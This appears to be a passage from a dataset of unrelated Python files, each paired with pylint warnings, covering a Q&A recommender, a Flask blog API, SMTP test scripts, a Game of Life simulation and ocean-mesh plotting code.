36 tfidf_matrix = tfidf.fit_transform(answered + questions)
37 count_matrix = count.fit_transform(tags_ans + tags_unans)
38
39 # similarity matrices: without and with tags
40 cosine_sim_body = linear_kernel(tfidf_matrix, tfidf_matrix)
41 cosine_sim_tags = linear_kernel(count_matrix, count_matrix) + cosine_sim_body
42
43 # rows: unanswered, cols: answered
44 unans_similarity_body = cosine_sim_body[nans:, :nans]
45 unans_similarity_tags = cosine_sim_tags[nans:, :nans]
46
47 # form of the following lists: [(feed index, value)]
48 sum_sim_body = enumerate([sum(r) for r in unans_similarity_body])
49 max_sim_body = enumerate([max(r) for r in unans_similarity_body])
50 sum_sim_tags = enumerate([sum(r) for r in unans_similarity_tags])
51 max_sim_tags = enumerate([max(r) for r in unans_similarity_tags])
52
53 # sort the indices by the value
54 sort_sum_sim_body = sorted(sum_sim_body, key=lambda x: x[1], reverse=True)
55 sort_max_sim_body = sorted(max_sim_body, key=lambda x: x[1], reverse=True)
56 sort_sum_sim_tags = sorted(sum_sim_tags, key=lambda x: x[1], reverse=True)
57 sort_max_sim_tags = sorted(max_sim_tags, key=lambda x: x[1], reverse=True)
58
59 # map each index to its classifications
60 by_sum_body = {x[0]: i for i, x in enumerate(sort_sum_sim_body)}
61 by_max_body = {x[0]: i for i, x in enumerate(sort_max_sim_body)}
62 by_sum_tags = {x[0]: i for i, x in enumerate(sort_sum_sim_tags)}
63 by_max_tags = {x[0]: i for i, x in enumerate(sort_max_sim_tags)}
64
65 # compute the mean classification for each index
66 mean_index = []
67 for i in range(nunans):
68 mean = (by_sum_body[i] + by_sum_tags[i] + by_max_body[i] + by_max_tags[i]) / 4
69 mean_index.append((mean, i))
70
71 # build the final recommended feed order
72 by_mean = [x[1] for x in sorted(mean_index)]
73
74 return by_mean, None
| 11 - refactor: too-many-locals
25 - warning: pointless-string-statement
|
1 """Statistics Tool for Answerable
2
3 This file contains the functions used to analyze user answers.
4 """
5
6 #
7 # TAG RELATED METRICS (USING QA)
8 #
9 _tags_info = None
10
11
12 def tags_info(qa):
13 """Map each tag to its score, acceptance and count"""
14
15 global _tags_info
16 if _tags_info is not None:
17 return _tags_info
18 tags_info = {}
19 for _, a in qa:
20 for t in a["tags"]:
21 tc = tags_info.get(t, (0, 0, 0)) # (score, acceptance, count)
22 tc = (tc[0] + a["score"], tc[1] + a["is_accepted"], tc[2] + 1)
23 tags_info[t] = tc
24 _tags_info = tags_info
25 return tags_info
26
27
28 def top_tags_use(qa, top=5):
29 """Top tags by appearance"""
30
31 tags = tags_info(qa)
32 sorted_tags = sorted(tags, key=lambda x: tags[x][2], reverse=True)
33 return [(x, tags[x][2]) for x in sorted_tags][:top]
34
35
36 def top_tags_score_abs(qa, top=5):
37 """Top tags by accumulated score"""
38
39 tags = tags_info(qa)
40 sorted_tags = sorted(tags, key=lambda x: tags[x][0], reverse=True)
41 return [(x, tags[x][0]) for x in sorted_tags][:top]
42
43
44 def top_tags_acceptance_abs(qa, top=5):
45 """Top tags by accumulated acceptance"""
46
47 tags = tags_info(qa)
48 sorted_tags = sorted(
49 tags,
50 key=lambda x: tags[x][1],
51 reverse=True,
52 )
53 return [(x, tags[x][1]) for x in sorted_tags][:top]
54
55
56 def top_tags_score_rel(qa, top=5):
57 """Top tags by score per answer"""
58
59 tags = tags_info(qa)
60 sorted_tags = sorted(tags, key=lambda x: tags[x][0] / tags[x][2], reverse=True)
61 return [(x, tags[x][0] / tags[x][2]) for x in sorted_tags][:top]
62
63
64 def top_tags_acceptance_rel(qa, top=5):
65 """Top tags by acceptance per answer"""
66
67 tags = tags_info(qa)
68 sorted_tags = sorted(tags, key=lambda x: tags[x][1] / tags[x][2], reverse=True)
69 return [(x, tags[x][1] / tags[x][2]) for x in sorted_tags][:top]
70
71
72 #
73 # ANSWER RELATED METRICS
74 #
75 def top_answers(answers, top=5):
76 """Top answers by score"""
77
78 return sorted(answers, key=lambda x: x["score"], reverse=True)[:top]
79
80
81 def top_accepted(answers, top=5):
82 """Top accepted answers by score"""
83
84 return list(
85 filter(
86 lambda x: x["is_accepted"],
87 sorted(answers, key=lambda x: x["score"], reverse=True),
88 )
89 )[:top]
90
91
92 #
93 # REPUTATION RELATED METRICS
94 #
95 def reputation(answer):
96 """Reputation associated to an answers
97 NOT ACCURATE
98 """
99
100 return answer["score"] * 10 + answer["is_accepted"] * 15
101
102
103 _answers_sorted_reputation = None
104 _total_reputation = None
105
106
107 def answers_sorted_reputation(answers):
108 """Answers sorted by associated reputation"""
109
110 global _answers_sorted_reputation
111 if _answers_sorted_reputation is None:
112 _answers_sorted_reputation = sorted(
113 answers, key=lambda x: reputation(x), reverse=True
114 )
115 return _answers_sorted_reputation
116
117
118 def total_reputation(answers):
119 """Total reputation gained from answers"""
120
121 global _total_reputation
122 if _total_reputation is None:
123 _total_reputation = sum([reputation(a) for a in answers])
124 return _total_reputation
125
126
127 def average_reputation_weight(answers, w):
128 """Average reputation and weight of answers generating w % reputation"""
129
130 repw = total_reputation(answers) * w
131 sorted_answers = answers_sorted_reputation(answers)
132 acc_rep = 0
133 acc_ans = 0
134 while acc_rep < repw and acc_ans < len(sorted_answers):
135 acc_rep += reputation(sorted_answers[acc_ans])
136 acc_ans += 1
137 if acc_ans == 0:
138 return (0, 0)
139 return (acc_rep / acc_ans, 100 * acc_ans / len(answers))
140
141
142 #
143 # LISTS TO SIMPLIFY CALLING
144 #
145 tag_metrics = [ # call with qa
146 ("Top used tags", top_tags_use),
147 ("Top tags by accumulated score", top_tags_score_abs),
148 ("Top tags by score per answer", top_tags_score_rel),
149 ("Top tags by accumulated acceptance", top_tags_acceptance_abs),
150 ("Top tags by acceptance per answer", top_tags_acceptance_rel),
151 ]
152 answer_metrics_single = [ # call with answers
153 ("Answers analyzed", len),
154 ("Total score", lambda x: sum([a["score"] for a in x])),
155 ("Average score", lambda x: sum([a["score"] for a in x]) / len(x)),
156 ("Total accepted", lambda x: sum([a["is_accepted"] for a in x])),
157 ("Acceptance ratio", lambda x: sum([a["is_accepted"] for a in x]) / len(x)),
158 ]
159 answer_metrics_tops = [ # call with answers
160 ("Top answers by score", top_answers, lambda a: a["score"]),
161 ("Top accepted answers by score", top_accepted, lambda a: a["score"]),
162 ]
163 reputation_metrics_single = [ # call with answers
164 ("Total reputation", lambda x: sum([reputation(a) for a in x])),
165 ("Average reputation", lambda x: sum([reputation(a) for a in x]) / len(x)),
166 ]
167 reputation_weight_metrics = ( # call with answers and weights
168 [0.95, 0.80],
169 average_reputation_weight,
170 (
171 "Average reputation on answers generating {:.0f}% reputation",
172 "Percentage of answers generating {:.0f}% reputation",
173 ),
174 )
| 18 - warning: redefined-outer-name
15 - warning: global-statement
110 - warning: global-statement
113 - warning: unnecessary-lambda
121 - warning: global-statement
123 - refactor: consider-using-generator
154 - refactor: consider-using-generator
155 - refactor: consider-using-generator
156 - refactor: consider-using-generator
157 - refactor: consider-using-generator
164 - refactor: consider-using-generator
165 - refactor: consider-using-generator
|
1 """Recommender Tool for Answerable
2
3 This file contains the recommendation algorithm.
4 """
5 import tools.displayer
6
7 from bs4 import BeautifulSoup as bs
8 from sklearn.feature_extraction.text import TfidfVectorizer
9 from sklearn.metrics.pairwise import linear_kernel
10 import numpy as np
11 import re
12
13
14 def preprocessed_text_from_html(html):
15 soup = bs(html, "html.parser")
16 for tag in soup.findAll(name="code"):
17 tag.decompose()
18 text = soup.getText(" ", strip=True)
19 text = re.sub(r"\d+", "", text)
20 text = " ".join(re.findall(r"[\w+_]+", text))
21 return text.lower()
22
23
24 def recommend(user_qa, feed):
25
26 answered = [
27 " ".join(x["tags"])
28 + " "
29 + x["title"].lower()
30 + " "
31 + preprocessed_text_from_html(x["body"])
32 for [x, _] in user_qa
33 ]
34
35 unanswered = [
36 " ".join(x["tags"])
37 + " "
38 + x["title"].lower()
39 + " "
40 + preprocessed_text_from_html(x["body"])
41 for x in feed
42 ]
43
44 nans = len(answered)
45
46 tfidf = TfidfVectorizer(stop_words="english")
47
48 # list of vectorized text
49 tfidf_matrix = tfidf.fit_transform(answered + unanswered)
50
51 # similarity matrix of each answer with the rest
52 cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)
53
54 # rows: unanswered, cols: answered
55 unans_similarity = cosine_sim[nans:, :nans]
56
57 # index: unanswered. values: max similarity, text size and score
58 max_sim = list(enumerate([max(r) for r in unans_similarity]))
59 unans_sizes = [len(u.split()) for u in unanswered]
60 score = [x * x * unans_sizes[i] for i, x in max_sim]
61
62 # sort the indices by the value
63 by_score = sorted(list(enumerate(score)), key=lambda x: x[1], reverse=True)
64
65 # relation between index in feed and index of closest answered
66 closest = [
67 (i, np.where(np.isclose(unans_similarity[i], v))[0][0]) for i, v in max_sim
68 ]
69
70 # store displayable information
71 b = tools.displayer.bold
72 info_f = "{}: {{}}\n{}:{{}} {}: {{}} {}: {{}}".format(
73 b("Closest"),
74 b("Text size"),
75 b("Similarity"),
76 b("Score"),
77 )
78 info = []
79 for unans, ans in closest:
80 info.append(
81 info_f.format(
82 user_qa[ans][0]["title"],
83 unans_sizes[unans],
84 f"{100*max_sim[unans][1]:.2f}%",
85 f"{score[unans]:.2f}",
86 )
87 )
88
89 # get the indexes, now sorted
90 sorted_index = [x[0] for x in by_score]
91
92 return sorted_index, info
| 24 - refactor: too-many-locals
|
1 import time
2 import threading
3 import os
4 import pwd
5 import grp
6 from client import Client
7
8 class BtsyncHelper:
9
10 global client
11 client = Client(host='127.0.0.1', port='8888', username='admin', password='******')
12
13 def get_folders(self):
14 return client.sync_folders
15
16 def check_folder(self, folder_path):
17 for f in self.get_folders():
18 if f['name'] == folder_path:
19 return True
20 return False
21
22 def create_folder(self, path):
23 secret = client.generate_secret()
24 return self.add_folder(path, secret['secret'])
25
26 def add_folder(self, path, secret):
27 if not os.path.exists(path):
28 os.makedirs(path)
29
30 if self.check_folder(path) == True:
31 return 'Folder: ' + str(path) + ' already synchronized'
32
33 uid = pwd.getpwnam('root').pw_uid
34 os.chown(path, uid, -1)
35
36 print 'Trying to open directory: ' + path
37 client.add_sync_folder(path, secret)
38
39 file = open(path + '/readme', 'a')
40 file.write('This file automatically created for testing synchronization by BitTorrent Sync')
41 file.close()
42 os.chown(path + '/readme', uid, -1)
43
44 return str(path) + " created! Secret: " + secret
| 36 - error: syntax-error
|
1 import pandas as pd
2 import numpy as np
3 import matplotlib.pyplot as plt
4 import seaborn as sns
5 from IPython.display import display
6 from sklearn.model_selection import train_test_split
7 from sklearn.linear_model import LinearRegression
8 from sklearn import metrics
9
10 customers = pd.read_csv('StudentsPerformance.csv')
11
12 display(customers.head())
13 customers.head()
14 customers.info()
15 display(customers.describe())
16
17 sns.jointplot('reading score', 'writing score', data=customers)
18 sns.pairplot(customers)
19 sns.lmplot('reading score', 'writing score', data=customers)
20
21 X = customers[['writing score', 'reading score', 'math score']]
22 y = customers[['math score']]
23
24 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=101)
25
26 lm = LinearRegression()
27
28 lm.fit(X_train, y_train)
29
30 print(lm.coef_)
31
32 predictions = lm.predict(X_test)
33
34 plt.scatter(y_test, predictions)
35 plt.xlabel('Y Test')
36 plt.ylabel('Predicted Y')
37
38 mae = metrics.mean_absolute_error(y_test, predictions)
39 mse = metrics.mean_squared_error(y_test, predictions)
40 rmse = np.sqrt(metrics.mean_squared_error(y_test, predictions))
41
42 print(mae, mse, rmse)
43
44 coeffs = pd.DataFrame(data=lm.coef_.transpose(), index=X.columns, columns=['Coefficient'])
45 coeffs.plot()
46 display(coeffs)
47 plt.show() | Clean Code: No Issues Detected
|
1 import smtplib
2 import getpass
3
4 FROM = 'zning'
5 TO = 'airportico@gmail.com'
6 SUBJECT = 'test'
7 TEXT = 'testtttt'
8
9 message = """ from: %s\nto: %s\nsubject: %s\n\n%s""" % (FROM, ", ".join(TO), SUBJECT, TEXT)
10
11 try:
12 server = smtplib.SMTP('smtp.gmail.com', 587)
13 server.ehlo()
14 server.starttls()
15 user = input("User name: ")
16 pwd = getpass.getpass('Password: ')
17 server.login(user, pwd)
18 server.sendmail(FROM, TO, message)
19 server.close()
20 print("email sent...")
21 except:
22 print("failed...") | 21 - warning: bare-except
|
1 import os
2 from shutil import copyfile
3
4 if os.path.exists(''):
5 os.remove('')
6
7 copyfile('', ) | 7 - error: no-value-for-parameter
|
1 import sys, argparse
2 import numpy as np
3 import matplotlib.pyplot as plot
4 import matplotlib.animation as animation
5
6 from helper import *
7 from displayTextSpawner import displayText
8 from inputValidator import validateInput
9
10 paused = True
11 iteration = 0
12
13 def update(frameNumber, image, grid, gridSize):
14 newGrid = grid.copy()
15 global paused
16 global iteration
17
18 if paused is True and iteration > 0:
19 value = raw_input('Press any [Key] to start simulation:')
20 image.set_data(newGrid)
21 grid[:] = newGrid[:]
22 paused = False
23 else:
24 for index in range(gridSize):
25 for subIndex in range(gridSize):
26 total = int((grid[index, (subIndex-1)%gridSize] + grid[index, (subIndex+1)%gridSize] +
27 grid[(index-1)%gridSize, subIndex] + grid[(index+1)%gridSize, subIndex] +
28 grid[(index-1)%gridSize, (subIndex-1)%gridSize] + grid[(index-1)%gridSize, (subIndex+1)%gridSize] +
29 grid[(index+1)%gridSize, (subIndex-1)%gridSize] + grid[(index+1)%gridSize, (subIndex+1)%gridSize])/ON)
30 if iteration > 0:
31 if grid[index, subIndex] == ON:
32 if (total < 2) or (total > 3):
33 newGrid[index, subIndex] = OFF
34 else:
35 if total == 3:
36 newGrid[index, subIndex] = ON
37 image.set_data(newGrid)
38 grid[:] = newGrid[:]
39 iteration += 1
40
41 return image
42
43 def main():
44 parser = argparse.ArgumentParser(description="Runs Conway's Game of Life simulation.")
45 parser.add_argument('--grid-size', dest='gridSize', required=False)
46 parser.add_argument('--mov-file', dest='movfile', required=False)
47 parser.add_argument('--interval', dest='interval', required=False)
48 parser.add_argument('--glider', dest='glider', required=False)
49 parser.add_argument('--gosper', dest='gosper', required=False)
50 parser.add_argument('--display', dest='displayText', required=False)
51 args = parser.parse_args()
52
53 gridSize = 100
54 if args.gridSize and int(args.gridSize) > 8:
55 gridSize = int(args.gridSize)
56
57 updateInterval = 50
58 if args.interval:
59 updateInterval = int(args.interval)
60
61 grid = np.array([])
62
63 if args.glider:
64 grid = np.zeros(gridSize*gridSize).reshape(gridSize, gridSize)
65 addGlider(1, 1, grid)
66 elif args.gosper:
67 grid = np.zeros(gridSize*gridSize).reshape(gridSize, gridSize)
68 addGosperGliderGun(10, 10, grid)
69 elif args.displayText and validateInput(args.displayText):
70 if args.displayText == 'alphanumspec':
71 grid = displayText('abcdefghijklmnopqrstuvwxyz_0123456789_', gridSize)
72 elif args.displayText == 'david':
73 grid = displayText('happy_birthday___david!!!!', gridSize)
74 else:
75 grid = displayText(args.displayText, gridSize)
76 else:
77 grid = randomGrid(gridSize)
78
79 fig, ax = plot.subplots()
80 img = ax.imshow(grid, interpolation='nearest')
81
82 plot.title("PyLife V1.0")
83
84 ani = animation.FuncAnimation(fig, update, fargs=(img, grid, gridSize),
85 frames = 10,
86 interval=updateInterval,
87 save_count=50)
88
89 if args.movfile:
90 ani.save(args.movfile, fps=30, extra_args=['-vcodec', 'libx264'])
91
92 plot.show()
93
94 if __name__ == '__main__':
95 main()
| 4 - refactor: consider-using-from-import
6 - warning: wildcard-import
15 - warning: global-statement
16 - warning: global-statement
19 - error: undefined-variable
29 - error: undefined-variable
31 - error: undefined-variable
33 - error: undefined-variable
36 - error: undefined-variable
18 - refactor: too-many-nested-blocks
13 - warning: unused-argument
19 - warning: unused-variable
65 - error: undefined-variable
68 - error: undefined-variable
77 - error: undefined-variable
1 - warning: unused-import
|
1 from alphaNumLib import *
2
3 alphaNumArray = alphaArray + numArray + specialArray
4
5 def validateInput(input):
6 if(checkInAlphaNumSpec(input)):
7 return True
8 else:
9 return False
10
11 def checkInAlphaNumSpec(input):
12 inputCharArray = list(input.lower())
13 for value in inputCharArray:
14 if value not in alphaNumArray:
15 return False
16 return True
| 1 - warning: wildcard-import
3 - error: undefined-variable
3 - error: undefined-variable
3 - error: undefined-variable
5 - warning: redefined-builtin
6 - refactor: simplifiable-if-statement
6 - refactor: no-else-return
11 - warning: redefined-builtin
|
1 import numpy as np
2 import matplotlib.pyplot as plot
3 import matplotlib.animation as animation
4
5 ON = 255
6 OFF = 0
7 vals = [ON, OFF]
8
9 def randomGrid(gridSize):
10 return np.random.choice(vals, gridSize*gridSize, p=[0.2, 0.8]).reshape(gridSize, gridSize)
11
12 def addGlider(row, col, grid):
13 glider = np.array([[OFF, OFF, ON],
14 [ON, OFF, ON],
15 [OFF, OFF, OFF]])
16 grid[row:row+3, col:col+3] = glider
17
18 def addGosperGliderGun(row, col, grid):
19 gun = np.zeros(11*38).reshape(11, 38)
20
21 gun[5][1] = gun[5][2] = ON
22 gun[6][1] = gun[6][2] = ON
23
24 gun[3][13] = gun[3][14] = ON
25 gun[4][12] = gun[4][16] = ON
26 gun[5][11] = gun[5][17] = ON
27 gun[6][11] = gun[6][15] = gun[6][17] = gun[6][18] = ON
28 gun[7][11] = gun[7][17] = ON
29 gun[8][12] = gun[8][16] = ON
30 gun[9][13] = gun[9][14] = ON
31
32 gun[1][25] = ON
33 gun[2][23] = gun[2][25] = ON
34 gun[3][21] = gun[3][22] = ON
35 gun[4][21] = gun[4][22] = ON
36 gun[5][21] = gun[5][22] = ON
37 gun[6][23] = gun[6][25] = ON
38 gun[7][25] = ON
39
40 gun[3][35] = gun[3][36] = ON
41 gun[4][35] = gun[4][36] = ON
42
43 grid[row:row+11, col:col+38] = gun
| 3 - refactor: consider-using-from-import
2 - warning: unused-import
3 - warning: unused-import
|
1 from flask_marshmallow import Marshmallow
2 from app import app
3 from app.models import User, Post, Comment
4
5 ma = Marshmallow(app)
6
7
8 class CommentSchema(ma.Schema):
9 class Meta:
10 fields = ("id", "post_id", "author_id", "title", "content", "publication_datetime")
11 model = Comment
12 ordered = True
13
14
15 class PostSchema(ma.Schema):
16 class Meta:
17 fields = ("id", "title", "content", "author_id", "publication_datetime", "comments")
18 model = Post
19 ordered = True
20
21 comments = ma.Nested(CommentSchema, many=True)
22
23
24 class UserSchema(ma.Schema):
25 class Meta:
26 fields = ("id", "username", "email", "password", "posts", "comments")
27 model = User
28 ordered = True
29
30 posts = ma.Nested(CommentSchema, many=True)
31 comments = ma.Nested(CommentSchema, many=True)
32
33
34 post_schema = PostSchema()
35 posts_schema = PostSchema(many=True)
36 comment_schema = PostSchema()
37 comments_schema = PostSchema(many=True)
38 user_schema = UserSchema()
39 users_schema = UserSchema(many=True) | 9 - refactor: too-few-public-methods
8 - refactor: too-few-public-methods
16 - refactor: too-few-public-methods
15 - refactor: too-few-public-methods
25 - refactor: too-few-public-methods
24 - refactor: too-few-public-methods
|
1 from config import Config
2 from flask import Flask
3 from flask_sqlalchemy import SQLAlchemy
4 from flask_migrate import Migrate
5
6
7 def create_app():
8 app = Flask(__name__)
9 app.config.from_object(Config)
10 app.debug = True
11
12 return app
13
14
15 app = create_app()
16 db = SQLAlchemy(app)
17 migrate = Migrate(app, db)
18
19
20 from app import api, models
21 db.create_all() | 8 - warning: redefined-outer-name
20 - warning: unused-import
20 - warning: unused-import
|
1 from datetime import datetime
2 from flask_bcrypt import generate_password_hash, check_password_hash
3
4 from app import db
5
6
7 class User(db.Model):
8 __tablename__ = 'users'
9 id = db.Column(db.Integer, primary_key=True, nullable=False)
10 username = db.Column(db.String(80), unique=True, nullable=False)
11 email = db.Column(db.String(120), unique=True, nullable=False)
12 password = db.Column(db.String(128), nullable=False)
13
14 posts = db.relationship('Post', backref='user', lazy='dynamic', cascade="all,delete")
15 comments = db.relationship('Comment', backref='user', lazy='dynamic', cascade="all,delete")
16
17 def hash_password(self):
18 self.password = generate_password_hash(self.password).decode('utf8')
19
20 def verify_password(self, password):
21 return check_password_hash(self.password, password)
22
23 def save(self):
24 db.session.add(self)
25 db.session.commit()
26
27 def __repr__(self):
28 return '<User %r>' % self.username
29
30
31 class Post(db.Model):
32 __tablename__ = 'posts'
33 id = db.Column(db.Integer, primary_key=True, nullable=False)
34 author_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
35 title = db.Column(db.String(50), nullable=False)
36 content = db.Column(db.String(256), nullable=False)
37 publication_datetime = db.Column(db.DateTime(), default=datetime.now(), nullable=False)
38 comments = db.relationship('Comment', backref='post', lazy='dynamic', cascade="all,delete")
39
40 def __repr__(self):
41 return '<Post %s>' % self.title
42
43
44 class Comment(db.Model):
45 __tablename__ = 'comments'
46 id = db.Column(db.Integer, primary_key=True, nullable=False)
47 post_id = db.Column(db.Integer, db.ForeignKey(Post.id), nullable=False)
48 author_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
49 title = db.Column(db.String(50), nullable=False)
50 content = db.Column(db.String(256), nullable=False)
51 publication_datetime = db.Column(db.DateTime(), default=datetime.now(), nullable=False)
52
53 def __repr__(self):
54 return '<Comment %s>' % self.title | 31 - refactor: too-few-public-methods
44 - refactor: too-few-public-methods
|
1 #!/usr/bin/env python
2
3 import difflib
4 import email.parser
5 import mailbox
6 import sys
7
8 f1, f2 = sys.argv[1:3]
9
10 expected = email.parser.Parser().parse(open(f1))
11
12 mbox = mailbox.mbox(f2, create=False)
13 msg = mbox[0]
14
15 diff = False
16
17 for h, val in expected.items():
18 if h not in msg:
19 print("Header missing: %r" % h)
20 diff = True
21 continue
22
23 if expected[h] == '*':
24 continue
25
26 if msg[h] != val:
27 print("Header %r differs: %r != %r" % (h, val, msg[h]))
28 diff = True
29
30
31 def flexible_eq(expected, got):
32 """Compare two strings, supporting wildcards.
33
34 This functions compares two strings, but supports wildcards on the
35 expected string. The following characters have special meaning:
36
37 - ? matches any character.
38 - * matches anything until the end of the line.
39
40 Returns True if equal (considering wildcards), False otherwise.
41 """
42 posG = 0
43 for c in expected:
44 if posG >= len(got):
45 return False
46
47 if c == '?':
48 posG += 1
49 continue
50 if c == '*':
51 while got[posG] != '\n':
52 posG += 1
53 continue
54 continue
55
56 if c != got[posG]:
57 return False
58
59 posG += 1
60
61 return True
62
63
64 if not flexible_eq(expected.get_payload(), msg.get_payload()):
65 diff = True
66
67 if expected.is_multipart() != msg.is_multipart():
68 print("Multipart differs, expected %s, got %s" % (
69 expected.is_multipart(), msg.is_multipart()))
70 elif not msg.is_multipart():
71 exp = expected.get_payload().splitlines()
72 got = msg.get_payload().splitlines()
73 print("Payload differs:")
74 for l in difflib.ndiff(exp, got):
75 print(l)
76
77 sys.exit(0 if not diff else 1)
| 18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
65 - warning: bad-indentation
67 - warning: bad-indentation
68 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
72 - warning: bad-indentation
73 - warning: bad-indentation
74 - warning: bad-indentation
75 - warning: bad-indentation
10 - refactor: consider-using-with
10 - warning: unspecified-encoding
31 - warning: redefined-outer-name
31 - warning: redefined-outer-name
|
1 #!/usr/bin/env python3
2 #
3 # Simple SMTP client for testing purposes.
4
5 import argparse
6 import email.parser
7 import email.policy
8 import smtplib
9 import sys
10
11 ap = argparse.ArgumentParser()
12 ap.add_argument("--server", help="SMTP server to connect to")
13 ap.add_argument("--user", help="Username to use in SMTP AUTH")
14 ap.add_argument("--password", help="Password to use in SMTP AUTH")
15 args = ap.parse_args()
16
17 # Parse the email using the "default" policy, which is not really the default.
18 # If unspecified, compat32 is used, which does not support UTF8.
19 msg = email.parser.Parser(policy=email.policy.default).parse(sys.stdin)
20
21 s = smtplib.SMTP(args.server)
22 s.starttls()
23 s.login(args.user, args.password)
24
25 # Note this does NOT support non-ascii message payloads transparently (headers
26 # are ok).
27 s.send_message(msg)
28 s.quit()
29
30
| Clean Code: No Issues Detected
|
1 import numpy as np
2 import matplotlib.pyplot as plt
3
4 def example():
5 x,y = np.linspace(-1,1,2), np.linspace(-1,1,2)
6 A, B = np.zeros((2,2)), np.zeros((2,2))
7 A[0,0]=1
8 B[0,0]=-1
9 A[0,1]=1
10 B[0,1]=1
11 A[1,0]=-1
12 B[1,0]=-1
13 A[1,1]=-1
14 B[1,1]=1
15
16 fig = plt.figure()
17 ax = fig.add_subplot(111)
18
19 # Plot the streamlines.
20 ax.streamplot(x,y,A,B)
21
22 ax.set_xlabel('$x$')
23 ax.set_ylabel('$y$')
24 ax.set_xlim(-2,2)
25 ax.set_ylim(-2,2)
26 ax.set_aspect('equal')
27 plt.show()
28
29 if __name__=='__main__':
30 example()
31
| Clean Code: No Issues Detected
|
1 #!/usr/bin/env python
2 '''
3 name: define_base_mesh
4 authors: Phillip J. Wolfram
5
6 This function specifies a high resolution patch for
7 Chris Jeffrey.
8
9 '''
10 import numpy as np
11
12 def cellWidthVsLatLon():
13 lat = np.arange(-90, 90.01, 1.0)
14 lon = np.arange(-180, 180.01, 2.0)
15
16 km = 1000.0
17 # in kms
18 baseRes = 120.0
19 highRes = 12.0
20 latC = 20.0
21 lonC = -155.0
22 rad = 10.0
23
24 theta = np.minimum(np.sqrt(((lat-latC)*(lat-latC))[:,np.newaxis] + ((lon-lonC)*(lon-lonC))[np.newaxis,:])/rad, 1.0)
25
26 cellWidth = (baseRes*theta + (1.0-theta)*highRes)*np.ones((lon.size,lat.size))
27
28 return cellWidth, lon, lat
| 16 - warning: unused-variable
|
1 import numpy as np
2 import jigsaw_to_MPAS.mesh_definition_tools as mdt
3 from jigsaw_to_MPAS.coastal_tools import signed_distance_from_geojson, \
4 compute_cell_width
5 from geometric_features import read_feature_collection
6 import xarray
7
8 # Uncomment to plot the cell size distribution.
9 # import matplotlib
10 # matplotlib.use('Agg')
11 # import matplotlib.pyplot as plt
12
13
14 def cellWidthVsLatLon():
15 """
16 Create cell width array for this mesh on a regular latitude-longitude grid.
17 Returns
18 -------
19 cellWidth : numpy.ndarray
20 m x n array, entries are desired cell width in km
21 lat : numpy.ndarray
22 latitude, vector of length m, with entries between -90 and 90,
23 degrees
24 lon : numpy.ndarray
25 longitude, vector of length n, with entries between -180 and 180,
26 degrees
27 """
28 dlon = 0.1
29 dlat = dlon
30 nlon = int(360./dlon) + 1
31 nlat = int(180./dlat) + 1
32 lon = np.linspace(-180., 180., nlon)
33 lat = np.linspace(-90., 90., nlat)
34
35 cellWidthSouth = 30. * np.ones((len(lat)))
36
37 # Transition at Equator
38 cellWidthNorth = mdt.EC_CellWidthVsLat(lat)
39 latTransition = 0.0
40 latWidthTransition = 5.0
41 cellWidthVsLat = mdt.mergeCellWidthVsLat(
42 lat,
43 cellWidthSouth,
44 cellWidthNorth,
45 latTransition,
46 latWidthTransition)
47
48 _, cellWidth = np.meshgrid(lon, cellWidthVsLat)
49
50 # now, add the high-res region
51 fc = read_feature_collection('high_res_region.geojson')
52
53 signed_distance = signed_distance_from_geojson(fc, lon, lat,
54 max_length=0.25)
55
56 da = xarray.DataArray(signed_distance,
57 dims=['y', 'x'],
58 coords={'y': lat, 'x': lon},
59 name='signed_distance')
60 cw_filename = 'signed_distance.nc'
61 da.to_netcdf(cw_filename)
62
63 # multiply by 5 because transition_width gets multiplied by 0.2 in
64 # compute_cell_width
65 # Equivalent to 10 degrees latitude
66 trans_width = 5*1100e3
67 # The last term compensates for the offset in compute_cell_width.
68 # The middle of the transition is ~2.5 degrees (300 km) south of the
69 # region boundary to best match previous transition at 48 S. (The mean lat
70 # of the boundary is 45.5 S.)
71 trans_start = -300e3 - 0.5 * trans_width
72 dx_min = 10.
73
74 cellWidth = compute_cell_width(signed_distance, cellWidth, lon,
75 lat, dx_min, trans_start, trans_width,
76 restrict_box={'include': [], 'exclude': []})
77
78 # Uncomment to plot the cell size distribution.
79 # Lon, Lat = np.meshgrid(lon, lat)
80 # ax = plt.subplot(111)
81 # plt.pcolormesh(Lon, Lat, cellWidth)
82 # plt.colorbar()
83 # ax.set_aspect('equal')
84 # ax.autoscale(tight=True)
85 # plt.tight_layout()
86 # plt.savefig('cellWidthVsLat.png', dpi=200)
87
88 return cellWidth, lon, lat
| 14 - refactor: too-many-locals
|
1 import numpy
2 from netCDF4 import Dataset
3 import matplotlib.pyplot as plt
4 import matplotlib
5 matplotlib.use('Agg')
6
7 fig = plt.gcf()
8 nRow = 6
9 nCol = 2
10 iTime = [8, 16]
11 nu = ['0.01', '0.1', '1', '10', '100', '200']
12 time = ['hour 8', 'hour 16']
13
14 fig, axs = plt.subplots(nRow, nCol, figsize=(
15 5.3 * nCol, 2.0 * nRow), constrained_layout=True)
16
17 for iRow in range(nRow):
18 ncfile = Dataset('output_' + str(iRow + 1) + '.nc', 'r')
19 var = ncfile.variables['temperature']
20 xtime = ncfile.variables['xtime']
21 for iCol in range(nCol):
22 ax = axs[iRow, iCol]
23 dis = ax.imshow(var[iTime[iCol], 0:512:4, :].T, extent=[
24 0, 120, 20, 0], aspect=2, cmap='jet', vmin=5, vmax=30)
25 if iRow == nRow - 1:
26 ax.set_xlabel('x, km')
27 if iCol == 0:
28 ax.set_ylabel('depth, m')
29 if iCol == nCol - 1:
30 fig.colorbar(dis, ax=axs[iRow, iCol], aspect=5)
31 ax.set_title(time[iCol] + ", " + r"$\nu_h=$" + nu[iRow])
32 ncfile.close()
33
34 plt.savefig('sections_lock_exchange.png', bbox_inches='tight')
| 1 - warning: unused-import
|
1 import math
2 from winds.wind_model import PROFILE_TYPE
3
4 class Parameters:
5 def __init__(self, mean_lat: float, wind_profile_type=PROFILE_TYPE.HOLLAND):
6 """
7 Constructor.
8 :param mean_lat: mean latitude of the hurricane trajectory to compute the Coroilis factor in radians
